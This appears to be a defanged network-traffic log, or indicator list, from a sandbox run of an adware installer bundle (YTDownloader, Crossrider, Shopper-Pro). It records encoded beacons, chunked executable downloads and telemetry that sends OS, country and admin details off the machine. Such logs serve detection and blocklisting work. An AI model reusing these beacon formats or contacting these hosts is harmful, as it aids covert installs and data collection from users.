hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=aQQpsP6/AW3kex8By7Tt8 86rkSdAtWAjQyBMoGHIGU2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3UlF4mqrDXF/v6HzWHDR5YBjz 1atQERUImrWWmth9mv19548reO4tAqx5ZzcGT1m31ic5SsWMkMpfY5 ihCfUhgKkdlz1lRoWCabnGOYGWkIjcUuop51X0s4IyTikyXffHXDX1FKG6cnYiyIdyncnyGtbx5hh3e7rVWKTfqlHworQx2Im0jTV2NmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVZZXXlPOL JdxOsvBqt15abnG0MGS7MFn	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=bomaaVKFzzJmS6nlSU/NTtmLWZlHWHRdaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWlSma92QTn2sr7GRIcOoydhUdGPD1b2Qs4eR0 6Iti9nqGVWRcbUjPZpjkZwwc6dH6FzoNt4Ofsjzs1eJiiYYwojgb6v7cXpPt1TM5RZKPL8I3u sa6VCXauJSim0H32xeh7Gcj1ILXhdtXANK2UVVldUmBhCw8CHnrErQ9Bnn0aP5VqPX5Zlqo/qvtb7DcQKwnST4L/oy1CaqfV3Ow7bWoU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0aergfKagB5OmVixU3rc7xpy wbvfw4rJ4aEzUiHG9lMnA==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=eISsn0A7mAaebxLgvS5H7u86rkSdAtWAjQyBMoGHIGU2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3UlF4mqrDXF/v6HzWHDR5YBjz 1atQERUImrWWmth9mv19548reO4tAqx5ZzcGT1m31ic5SsWMkMpfY5 ihCfUhgKkdlz1lRoWCabnGOYGWkIjcUuop51X0s4IyTikyXffHXDX1FKG6cnYiyIdyncnyGtbx5hh3e7rVWKTfqlHworQx2Im0jTV2NmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVZZXXlPOL JdxOsvBqt15abnG0MGS7MFn	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=/TVH52TeC6TKPGBAjb/btiFCw8TNbDW2KB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyObfJsKHIM1ro2z8LjnD4BZNQQy9IgZy5lJKYX3Ti/i3YON3V5qfYBQRRUmpStNaTb9EkykGnz5PdJi1CRp07F4ZRCubuqRAnTtUsYja0YwBmQQeWksviRUhfZterOdBrBxh8h5o3YrXrZv qR/r3k14i5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkFE9hpSWZ9F0Ui/TCqSxnnVKX1npUvH4g=	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=37A8KpTgCn9F7U1zsAAEATXFZMskXaRjgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsmxP7YdWR5r9BKJkTiY0kK4P1EuvY4ytw35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9y8LB58LMRx20oPfCrfVvRJhQC drCF7eFFzHXlUtGqMpFXY228EJx8lbQfHq0QVBDK o5K8SmD/QklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGDXXK/TPYKAhZ5uN 0cKdwC2CxsCr1x8yMZm 8qxpeoo=	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=wvekM9Cn2bXKPGBAjb/btg MYfP ytabKB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyObyBfkdHFoABez8LjnD4BZNQQy9IgZy5lJKYX3Ti/i3YNYlTZYFVSl7BQeC5LF6ah0rpfaXeB YwuYVlUn0AVnrxK0BnK2QDnhjRLWdbF/ZlRkHo9YSS// 6AqUZoVYaYqslbpiJVl1O8sY1sBZzE93jVQk8gY3vhjPQ6wHhFi22CNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVZZXXlPOL JdxOsvBqt15abnG0MGS7MFn	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/10464.ashx?e=j7YMo/n29XPkTjH401c/dBqxh0QeCQ8TtwaYA5cXz7 JSpJdq6tfQOrVyaMS1AoBVcsZgjOTLBgfrMymJYVnXsm9xQXHrEEufJsKHIM1ro1Fhap1svS6Dz9hP8ILQ7STKYX3Ti/i3YOeiDpdSVt7BwfZFku3V2enpSLERfTF/PAjtuufyo2/uPPP1z34ZOLgOXZ eJ1Vkp3MI41K2f6iZFP u/7dSCX0U7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ=	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=uWabAt9SLcyBuMQa44hX0CgKFoNUu98snvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRg11yv0z2CgIWebjftHCncAtgsbAq9cfMqLQ1AVjbz2R20qHT6WNWM4V 9m YgK2IN2ZOiYEsonqrXIxNf6X/p9DL5O8sflI1 03aTMX7laps IILilpWF3u3FmdwwefTlG/S2AduK1Q3T3SRc0DL8l/N3fFIaCTliSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkYNdcr9M9goCFnm437Rwp3ALYLGwKvXHzIxmb7yrGl6ig==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=bdqY0vC4PYvKPGBAjb/btjeCxNdsViG7KB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyObj0N7bp/0QtTuE hIh9G/eRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KybE/th1ZHmv0EomROJjSQrgPyvVweGBaX	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=vjRn qH YuNF7U1zsAAEARc/5E8bc B9gDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsmxP7YdWR5r9BKJkTiY0kK4P1EuvY4ytw35CmT3i5NSF2vIg0CxxvYpwrUnfQ7wwchbF8KQGju9yclHT2qvGHtt0js0 pge/oATxIUcsgQ wJsGRaf2SnGVO5dNaLjdAlsm0Hf94vw94T19gmVWfgZBTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp6uB8pqAHk6ZWLFTetzvGnL7Bu9/DisnhoTNSIcb2Uyc	198.232.124.192
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=1729&action=na&ms_vr=3&clock=15&rnd=27847	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=803&action=na&ms_vr=3&clock=0&rnd=27847	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=10&n=ms_started&rnd=6928	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=6928	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=20&n=ms_start_download&rnd=10665	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=10665	208.85.150.249
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_d
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe_a
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_a
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe_d
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=7088	208.85.150.249
hxxp://www.ytdownloader.com/app/ping.ashx?action=S_INSTALL&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&rnd=21214&v=1.0.8654.1204&url=&title=&pingtext=Files& protocol=&size=0&ref=&browser=	107.20.238.80
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=28053	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=7088	208.85.150.249
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=KSz5qzb2KgIPgAd18hbyriP5Xzi0RWWWjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YFxk58JurVk52xuLvM2GxYQ5nnmIZ1dQR6XwF8xC533Fc8E2Pd9CMWovNtgMO1a3Sb80v5DDGc2FBbzjSNwj8cRJWOvghCBTr/XvKbjUyzCCcFAL52sIXt4V mdZi2lOgm uz5FUTyZHq7FlkgieM9uF8HvEUquLYK5RF10/JyN4cjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWm5xtDBkuzBZw==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=hXeqmv1Ipen8DUZEY163AMo8YECNv9u21D73iItxtxEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45BRPYaUlmfRdFIv0wqksZ59ISJu0ort4R6tXJoxLUCgFVyxmCM5MsGHyo0lM9 97QvBR8U17HI5t1W82Rf90R64zSKxHboXxzsriKGopLF7SOBvq/txek 368KsLDi8ejGLqdccWbOXhQkiHPQlSnMR8SmM80PtO/nz2CRmELfmr2Z3kJKtxQJKHi8lJ8ZZ64X6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YFxk58JurVk52xuLvM2GxYQ5nnmIZ1dQR6Q==	198.232.124.192
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=803&i=35&n=ms_about_to_exc&rnd=28053	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=1729&action=na&ms_vr=3&clock=5031&rnd=4904	208.85.150.249
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=KSz5qzb2KgIPgAd18hbyriP5Xzi0RWWWjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YFxk58JurVk52xuLvM2GxYQ5nnmIZ1dQR6XwF8xC533Fc8E2Pd9CMWovNtgMO1a3Sb80v5DDGc2FBbzjSNwj8cRIXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVo0KXYjr4isejZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVWWV15Tzi/iXcTrLwardeWm5xtDBkuzBZw==	198.232.124.192
hxxp://9oq3c5-zxis6jz8.netdna-ssl.com/21214.ashx?e=jLYfrKkKGYPKPGBAjb/btsKRcGDMEsV9KB2ZKuKuT4Xezmr5wsXHLCEdbCsTxXU3qJDnlUORNKJFgAYD7IlOOQUT2GlJZn0XRSL9MKpLGefSEibtKK7eEerVyaMS1AoBVcsZgjOTLBh8qNJTPfve0LwUfFNexyOby2yKeb vB GLGe0GBQxZ8R12Y34RZ2ijgb6v7cXpPvfJKubRTxkYPISyAE k24Wq8mha7dWcrUEK9eU5oqfvo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VlldeU84v4l3E6y8Gq3XlpucbQwZLswWc=	198.232.124.192
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=5969&rnd=4904	208.85.150.249
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1441695305
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1441695306
hxxp://ipgeoapi.com/	23.21.247.21
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_100&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1441695306&procruntime=7&rnd=1441695313
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_83&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=TGH9KDVOZsqytilSN62IGgYdRC8Adht035Oiv/VdBFOgbDsIW6H8ZEmIuWDuytIcxAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1441695305&procruntime=8&rnd=1441695313
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695306&procruntime=8&rnd=1441695314
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695305&procruntime=9&rnd=1441695314
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1441695306&asw=0_1073750528_-2147483648_2048&browser=&rnd=1441695306
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1441695305&asw=0_1073750528_-2147483648_2048&browser=&rnd=1441695305
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1441695314
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1441695314
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1441695314
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1441695315
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1441695316
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1441695316
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1441695316
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1441695317
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1441695317
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1441695317
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1441695317
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1441695317
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1441695317
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1441695317
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1441695317
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1441695317
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1441695318
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1441695318
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1441695318
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1441695318
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1441695318
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1441695318
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1441695318
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1441695319
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1441695320
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_83&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695305&procruntime=15&rnd=1441695320
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=7064429D9C88417885E6E9F5385B8646PI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1441695305&lifetime=0&silent=1&crtnm=na&procstarttime=1441695305&procruntime=15&rnd=1441695320
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1441695320
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_100&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1441695306&procruntime=15&rnd=1441695321
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-09-08&bic=03a471124f01b8b4a21fa91e866e62edIE&verifier=67a1823aa892cacdb48c5c33d8b81ea2&upi=03a471124f01b8b4a21fa91e866e62ed&procid=4490BA80584744D2ABB64309374D51AFPI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGOFV6b2JyZGMxLDk5OTk5OTk5LTk5OTktNDE5YS04MWVmLWY2ZDZkZDU3MDgxYywiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTQxOWEtODFlZi1mNmQ2ZGQ1NzA4MWMifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1441695306&lifetime=0&silent=1&crtnm=na&procstarttime=1441695306&procruntime=15&rnd=1441695321
hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=1729&action=na&ms_vr=3&clock=24187&rnd=24757	208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=803&action=na&ms_vr=3&clock=24438&rnd=24757	208.85.150.249
hxxp://rep.shopper-pro.com/app/ping.ashx?action=install&userid=&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=MjEyMTQA&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?action=start&userid={3DDADCD7-C12E-426F-B69A-34C6CF1194AE}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=IGNvbnZlcnRlcjogMy4zLjEuNTsgZHJpdmVyOiBDOlxQcm9ncmFtIEZpbGVzXFlURG93bmxvYWRlclxzYm1udHIuc3lzIDEuMC4wLjI7IGhlbHBlcjogMS4wLjEuNTsgc2VydmljZTogMS4wLjEuNTsA&protocol=&size=0&ref=&browser=	54.197.238.106
hxxp://rep.shopper-pro.com/app/ping.ashx?action=start&userid={3DDADCD7-C12E-426F-B69A-34C6CF1194AE}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-419a-81ef-f6d6dd57081c,&v=1.0.8654.1204&url=&title=&pingtext=TWljcm9zb2Z0IFdpbmRvd3MgWFAgUHJvZmVzc2lvbmFsIFNlcnZpY2UgUGFjayAzIChidWlsZCAyNjAwKQA=&protocol=&size=0&ref=&browser=	54.197.238.106
